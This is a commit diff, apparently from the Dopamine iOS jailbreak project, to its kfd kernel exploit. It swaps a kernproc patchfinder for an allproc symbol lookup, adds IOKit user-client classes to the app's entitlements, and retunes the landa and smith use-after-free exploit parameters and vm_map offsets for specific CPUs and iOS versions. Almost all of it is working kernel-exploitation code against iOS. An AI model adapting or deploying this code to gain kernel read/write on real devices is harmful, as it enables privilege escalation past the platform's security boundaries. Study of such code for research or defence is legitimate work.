opa334
diff --git a/‎.gitignore
Lines changed: 1 addition & 3 deletions b/‎.gitignore
Lines changed: 1 addition & 3 deletions
diff --git a/‎Application/Dopamine.xcodeproj/project.pbxproj
Lines changed: 656 additions & 14 deletions b/‎Application/Dopamine.xcodeproj/project.pbxproj
Lines changed: 656 additions & 14 deletions
diff --git a/‎Application/Dopamine/Dependencies/libcurl.a
-4.25 MB b/‎Application/Dopamine/Dependencies/libcurl.a
-4.25 MB
diff --git a/‎Application/Dopamine/Dependencies/libfragmentzip.a
-30.8 KB b/‎Application/Dopamine/Dependencies/libfragmentzip.a
-30.8 KB
diff --git a/‎Application/Dopamine/Dependencies/libgrabkernel.a
-19.8 KB b/‎Application/Dopamine/Dependencies/libgrabkernel.a
-19.8 KB
diff --git a/‎Application/Dopamine/Dependencies/libgrabkernel2.a
43.1 KB b/‎Application/Dopamine/Dependencies/libgrabkernel2.a
43.1 KB
diff --git a/‎Application/Dopamine/Dependencies/libpartial.a
71.5 KB b/‎Application/Dopamine/Dependencies/libpartial.a
71.5 KB
diff --git a/‎Application/Dopamine/Dopamine.entitlements
Lines changed: 5 additions & 0 deletions b/‎Application/Dopamine/Dopamine.entitlements
Lines changed: 5 additions & 0 deletions
diff --git a/‎Application/Dopamine/Exploits/kfd/Exploit/libkfd/info/dynamic_info.h
Lines changed: 3 additions & 0 deletions b/‎Application/Dopamine/Exploits/kfd/Exploit/libkfd/info/dynamic_info.h
Lines changed: 3 additions & 0 deletions
diff --git a/‎Application/Dopamine/Exploits/kfd/Exploit/libkfd/krkw/kread/kread_IOSurface.h
Lines changed: 6 additions & 101 deletions b/‎Application/Dopamine/Exploits/kfd/Exploit/libkfd/krkw/kread/kread_IOSurface.h
Lines changed: 6 additions & 101 deletions
diff --git a/‎Application/Dopamine/Exploits/kfd/Exploit/libkfd/puaf/landa.h
Lines changed: 14 additions & 2 deletions b/‎Application/Dopamine/Exploits/kfd/Exploit/libkfd/puaf/landa.h
Lines changed: 14 additions & 2 deletions
diff --git a/‎Application/Dopamine/Exploits/kfd/Exploit/libkfd/puaf/smith.h
Lines changed: 1 addition & 1 deletion b/‎Application/Dopamine/Exploits/kfd/Exploit/libkfd/puaf/smith.h
Lines changed: 1 addition & 1 deletion
diff --git a/‎Application/Dopamine/Exploits/kfd/Info.plist
Lines changed: 30 additions & 32 deletions b/‎Application/Dopamine/Exploits/kfd/Info.plist
Lines changed: 30 additions & 32 deletions
diff --git a/‎Application/Dopamine/Exploits/kfd/kfd.m
Lines changed: 20 additions & 6 deletions b/‎Application/Dopamine/Exploits/kfd/kfd.m
Lines changed: 20 additions & 6 deletions
@@ -6,10 +6,8 @@ xcshareddata/
 DerivedData/
 .swiftpm/xcode/
 /Package.resolved
-/Server/orig.ipa
-/Server/serverCert/fullchain.cer
-/Server/serverCert/server.key
 Dopamine/Dopamine/bootstrap/tmp/
+Application/Payload
 .idea
 Tools/fastPathSign/.build_*
 Exploits/kfd/kfd.framework/kfd
@@ -36,8 +36,13 @@
 	<array>
 		<string>AGXDevice</string>
 		<string>AGXDeviceUserClient</string>
+		<string>AGXSharedUserClient</string>
+		<string>AGXGLContext</string>
+		<string>AGXCommandQueue</string>
 		<string>IOSurfaceRoot</string>
 		<string>IOSurfaceRootUserClient</string>
+		<string>AppleJPEGDriverUserClient</string>
+        <string>H11ANEInDirectPathClient</string>
 	</array>
 	<key>com.apple.developer.kernel.extended-virtual-addressing</key>
 	<true/>
 
@@ -12,6 +12,7 @@ struct dynamic_info {
     u64 kernelcache__static_base;
     // struct proc
     u64 proc__p_list__le_prev;
+    u64 proc__p_list__le_next;
     u64 proc__task;
     u64 proc__p_pid;
     u64 proc__p_fd__fd_ofiles;
@@ -40,6 +41,8 @@ struct dynamic_info {
     u64 IOSurface__useCountPtr;
     u64 IOSurface__indexedTimestampPtr;
     u64 IOSurface__readDisplacement;
+    // kernelcache static addresses (IOSurface)
+    u64 kernelcache__allproc;
     // kernelcache static addresses (perf)
     u64 kernelcache__cdevsw;                          // "spec_open type" or "Can't mark ptc as kqueue ok"
     u64 kernelcache__gPhysBase;                       // "%s: illegal PA: 0x%llx; phys base 0x%llx, size 0x%llx"
 
@@ -116,100 +116,6 @@ static inline int64_t adrp_off(uint32_t adrp)
     return sxt64((((((uint64_t)adrp >> 5) & 0x7ffffULL) << 2) | (((uint64_t)adrp >> 29) & 0x3ULL)) << 12, 33);
 }
 
-u64 patchfind_kernproc(struct kfd* kfd, u64 kernel_base)
-{
-    //u64 kernel_slide = kernel_base - ARM64_LINK_ADDR;
-    // ^ only for debugging
-    
-    u64 textexec_text_addr = 0, textexec_text_size = 0;
-    get_kernel_section(kfd, kernel_base, "__TEXT_EXEC", "__text", &textexec_text_addr, &textexec_text_size);
-    assert(textexec_text_addr != 0 && textexec_text_size != 0);
-    
-    u64 textexec_text_addr_end = textexec_text_addr + textexec_text_size;
-    
-    // For some reason "mov w8, #0x1006" always follows a kernproc reference, we take advantage of that here
-    
-    u32 movSearch = 0x528200C8; // "mov w8, #0x1006"
-    u64 movKaddr = 0;
-    
-    // this patchfinder is slow af, we start 0x180000 in to speed it up because the reference we're looking for is usually in this area
-#define FAST_START 0x180000
-    
-    u64 instrForward = textexec_text_addr + FAST_START;
-    u64 instrBackward = instrForward;
-    
-    while (true) {
-        if (instrForward < textexec_text_addr_end) {
-            u32 instr = 0;
-            kread((u64)kfd, instrForward, &instr, sizeof(instr));
-            if (instr == movSearch) {
-                movKaddr = instrForward;
-                break;
-            }
-            instrForward += 4;
-        }
-        if (instrBackward > textexec_text_addr) {
-            u32 instr = 0;
-            kread((u64)kfd, instrBackward, &instr, sizeof(instr));
-            if (instr == movSearch) {
-                movKaddr = instrBackward;
-                break;
-            }
-            instrBackward -= 4;
-        }
-    }
-    
-    // okay this is fucked
-    // there are two adrp, ldr's following but the problem is that they're apart (sometimes) and only one of them is kernproc
-    // one ldr is going into some obscure "D<>" register, we need to filter that out, then get the x register of the other one
-    // then seek back for the adrp that loaded a value into this register, then we need to decode the adrp and the ldr
-    
-    u64 ldrKaddr = 0;
-    u32 ldrInstr = 0;
-    for (u32 i = 0; i < 20; i++) {
-        u64 addr = movKaddr+(4*i);
-        u32 instr = 0;
-        kread((u64)kfd, addr, &instr, sizeof(instr));
-        if ((instr & 0xFFC00000) == 0xF9400000) { // check if ldr (we automatically filter the shit one out here)
-            ldrKaddr = addr;
-            ldrInstr = instr;
-            break;
-        }
-    }
-    
-    //printf("ldrKaddr: 0x%llx\n", ldrKaddr - kernel_slide);
-    //printf("ldrInstr: 0x%x\n", ldrInstr);
-    
-    u32 ldrReg = (ldrInstr & 0x3E0) >> 5;
-    //printf("ldrReg: %d\n", ldrReg);
-    
-    u32 adrpFind = 0x90000000 | ldrReg;
-    u32 adrpFindMask = 0x9F00001F;
-    
-    u64 adrpKaddr = 0;
-    u32 adrpInstr = 0;
-    for (u32 i = 0; i < 30; i++) {
-        u64 addr = ldrKaddr-(4*i);
-        u32 instr = 0;
-        kread((u64)kfd, addr, &instr, sizeof(instr));
-        if ((instr & adrpFindMask) == adrpFind) {
-            adrpKaddr = addr;
-            adrpInstr = instr;
-            break;
-        }
-    }
-    
-    // We got everything we need! Now just decode and get kernproc
-    
-    i64 adrp_imm = adrp_off(adrpInstr);
-    u32 ldr_imm = ((ldrInstr & 0x003FFC00) >> 9) * 4;
-    
-    //printf("adrp_imm: %lld\n", adrp_imm);
-    //printf("ldr_imm: 0x%X\n", ldr_imm);
-    //printf("adrpKaddr page: 0x%llX\n", (adrpKaddr - kernel_slide) & ~0xfff);
-    
-    return ((adrpKaddr & ~0xfff) + adrp_imm) + ldr_imm;
-}
 
 void kread_IOSurface_find_proc(struct kfd* kfd)
 {
@@ -244,22 +150,21 @@ void kread_IOSurface_find_proc(struct kfd* kfd)
     }
 
     u64 kernel_slide = kernel_base - ARM64_LINK_ADDR;
-    u64 kernproc = patchfind_kernproc(kfd, kernel_base);
     kfd->info.kaddr.kernel_slide = kernel_slide;
+    u64 allproc = kernel_slide + dynamic_info(kernelcache__allproc);
 
     u64 proc_kaddr = 0;
-    kread((u64)kfd, kernproc, &proc_kaddr, sizeof(proc_kaddr));
+    kread((u64)kfd, allproc, &proc_kaddr, sizeof(proc_kaddr));
     proc_kaddr = UNSIGN_PTR(proc_kaddr);
-    kfd->info.kaddr.kernel_proc = proc_kaddr;
-    
     while (proc_kaddr != 0) {
         u32 pid = (u32)dynamic_kget(proc__p_pid, proc_kaddr);
         if (pid == kfd->info.env.pid) {
             kfd->info.kaddr.current_proc = proc_kaddr;
-            break;
         }
-
-        proc_kaddr = dynamic_kget(proc__p_list__le_prev, proc_kaddr);
+        else if (pid == 0) {
+            kfd->info.kaddr.kernel_proc = proc_kaddr;
+        }
+        proc_kaddr = dynamic_kget(proc__p_list__le_next, proc_kaddr);
     }
 }
 
 
@@ -5,8 +5,8 @@
 #ifndef landa_h
 #define landa_h
 
-const u64 landa_vme1_size = pages(1);
-const u64 landa_vme2_size = pages(1);
+u64 landa_vme1_size = pages(1);
+u64 landa_vme2_size = pages(1);
 const u64 landa_vme4_size = pages(1);
 
 // Forward declarations for helper functions.
@@ -37,6 +37,18 @@ void landa_init(struct kfd* kfd)
 {
     kfd->puaf.puaf_method_data_size = sizeof(struct landa_data);
     kfd->puaf.puaf_method_data = malloc_bzero(kfd->puaf.puaf_method_data_size);
+    
+    // use default values for non-A8
+    landa_vme1_size = pages(1);
+    landa_vme2_size = pages(1);
+    cpu_subtype_t cpuFamily = 0;
+    size_t cpuFamilySize = sizeof(cpuFamily);
+    sysctlbyname("hw.cpufamily", &cpuFamily, &cpuFamilySize, NULL, 0);
+    if (cpuFamily == CPUFAMILY_ARM_TYPHOON) {
+        // use pages(16) for A8. Not sure why this works.
+        landa_vme1_size = pages(16);
+        landa_vme2_size = pages(16);
+    }
 }
 
 void landa_run(struct kfd* kfd)
 
@@ -209,7 +209,7 @@ void smith_free(struct kfd* kfd)
  */
 void smith_helper_init(struct kfd* kfd)
 {
-    const u64 target_hole_size = pages(0);
+    const u64 target_hole_size = pages(10000);
     bool found_target_hole = false;
 
     struct smith_data* smith = (struct smith_data*)(kfd->puaf.puaf_method_data);
 
@@ -7,64 +7,49 @@
 		<key>landa</key>
 		<dict>
 			<key>DPFlavorPriority</key>
-			<integer>800</integer>
+			<integer>900</integer>
+			<key>DPSupportExclude</key>
+			<array/>
+			<key>DPSupportInclude</key>
+			<array/>
 			<key>DPSupportedRanges</key>
 			<array>
 				<dict>
-					<key>Start</key>
-					<string>15.0</string>
 					<key>End</key>
 					<string>16.6.1</string>
+					<key>Start</key>
+					<string>15.0</string>
 				</dict>
 			</array>
-			<key>DPSupportExclude</key>
-			<array/>
-			<key>DPSupportInclude</key>
-			<array/>
 		</dict>
 		<key>physpuppet</key>
 		<dict>
 			<key>DPFlavorPriority</key>
 			<integer>1000</integer>
+			<key>DPSupportExclude</key>
+			<array/>
+			<key>DPSupportInclude</key>
+			<array/>
 			<key>DPSupportedRanges</key>
 			<array>
 				<dict>
-					<key>Start</key>
-					<string>15.0</string>
 					<key>End</key>
 					<string>15.7.3</string>
+					<key>Start</key>
+					<string>15.0</string>
 				</dict>
 				<dict>
-					<key>Start</key>
-					<string>16.0</string>
 					<key>End</key>
 					<string>16.3.1</string>
+					<key>Start</key>
+					<string>16.0</string>
 				</dict>
 			</array>
-			<key>DPSupportExclude</key>
-			<array/>
-			<key>DPSupportInclude</key>
-			<array/>
 		</dict>
 		<key>smith</key>
 		<dict>
 			<key>DPFlavorPriority</key>
 			<integer>600</integer>
-			<key>DPSupportedRanges</key>
-			<array>
-				<dict>
-					<key>Start</key>
-					<string>15.0</string>
-					<key>End</key>
-					<string>15.7.6</string>
-				</dict>
-				<dict>
-					<key>Start</key>
-					<string>16.0</string>
-					<key>End</key>
-					<string>16.5</string>
-				</dict>
-			</array>
 			<key>DPSupportExclude</key>
 			<array/>
 			<key>DPSupportInclude</key>
@@ -76,11 +61,24 @@
 					</array>
 				</dict>
 			</array>
+			<key>DPSupportedRanges</key>
+			<array>
+				<dict>
+					<key>End</key>
+					<string>15.7.6</string>
+					<key>Start</key>
+					<string>15.0</string>
+				</dict>
+				<dict>
+					<key>End</key>
+					<string>16.5</string>
+					<key>Start</key>
+					<string>16.0</string>
+				</dict>
+			</array>
 		</dict>
 	</dict>
 	<key>DPExploitType</key>
 	<string>Kernel</string>
-	<key>CFBundleDisplayName</key>
-	<string>kfd</string>
 </dict>
 </plist>
@@ -148,13 +148,25 @@ int exploit_init(const char *flavor)
 
     uint64_t vm_map__pmap = koffsetof(vm_map, pmap);
 
+    uint64_t pmap_to_hint = 0; // offset between vm_map->pmap and vm_map->hint
+    if (@available(iOS 16.0, *)) {
+        pmap_to_hint = 0x58;
+    }
+    else if(@available(iOS 15.4, *)) {
+        pmap_to_hint = 0x38;
+    }
+    else {
+        pmap_to_hint = 0xB8;
+    }
+
     dynamic_system_info = (struct dynamic_info){
         .kread_kqueue_workloop_ctl_supported = true,
         .krkw_iosurface_supported = (kread_method == kread_IOSurface),
         .perf_supported = (kread_method != kread_IOSurface || kwrite_method != kwrite_IOSurface),
 
         .kernelcache__static_base = kconstant(staticBase),
 
+        .proc__p_list__le_next = koffsetof(proc, list_next),
         .proc__p_list__le_prev = koffsetof(proc, list_prev),
         .proc__p_pid           = koffsetof(proc, pid),
         .proc__p_fd__fd_ofiles = koffsetof(proc, fd) + koffsetof(filedesc, ofiles_start),
@@ -170,11 +182,11 @@ int exploit_init(const char *flavor)
         .vm_map__hdr_nentries_u64           = koffsetof(vm_map, hdr) + koffsetof(vm_map_header, links) + koffsetof(vm_map_links, max) + 0x8,
         .vm_map__hdr_rb_head_store_rbh_root = koffsetof(vm_map, hdr) + koffsetof(vm_map_header, links) + koffsetof(vm_map_links, max) + 0x18,
 
-        .vm_map__pmap        = vm_map__pmap,        // 0x48 or 0x40
-        .vm_map__hint        = vm_map__pmap + 0x58, // 0xa0 or 0x98
-        .vm_map__hole_hint   = vm_map__pmap + 0x60, // 0xa8 or 0xa0
-        .vm_map__holes_list  = vm_map__pmap + 0x68, // 0xb0 or 0xa8
-        .vm_map__object_size = vm_map__pmap + 0x80, // 0xc8 or 0xc0
+        .vm_map__pmap        = vm_map__pmap,
+        .vm_map__hint        = vm_map__pmap + pmap_to_hint,
+        .vm_map__hole_hint   = vm_map__pmap + pmap_to_hint + 0x8,
+        .vm_map__holes_list  = vm_map__pmap + pmap_to_hint + 0x10,
+        .vm_map__object_size = vm_map__pmap + pmap_to_hint + 0x28,
 
         .IOSurface__isa                 =   0x0,
         .IOSurface__pixelFormat         =  0xa4,
@@ -185,6 +197,8 @@ int exploit_init(const char *flavor)
 
         .thread__thread_id = 0x400, // TODO: Universalize (Only relevant for kread_kqueue_workloop_ctl)
 
+        .kernelcache__allproc          = ksymbol(allproc),
+        
         .kernelcache__cdevsw           = ksymbol(cdevsw),
         .kernelcache__gPhysBase        = ksymbol(gPhysBase),
         .kernelcache__gPhysSize        = ksymbol(gPhysSize),
@@ -228,7 +242,7 @@ int exploit_init(const char *flavor)
             puaf_pages = 160;
         }
     } else if (cpuFamily == CPUFAMILY_ARM_TYPHOON) { // A8
-        puaf_pages = 32;
+        puaf_pages = 256;
     }
 
     printf("device info: CPU family: 0x%x, RAM: 0x%010llx, available: 0x%010zx\n", cpuFamily, device_memory, available_memory);
Original file line number	Diff line number	Diff line change
`@@ -209,7 +209,7 @@ void smith_free(struct kfd* kfd)`
`209`	`209`	`*/`
`210`	`210`	`void smith_helper_init(struct kfd* kfd)`
`211`	`211`	`{`
`212`		`- const u64 target_hole_size = pages(0);`
	`212`	`+ const u64 target_hole_size = pages(10000);`
`213`	`213`	`bool found_target_hole = false;`
`214`	`214`
`215`	`215`	`struct smith_data* smith = (struct smith_data*)(kfd->puaf.puaf_method_data);`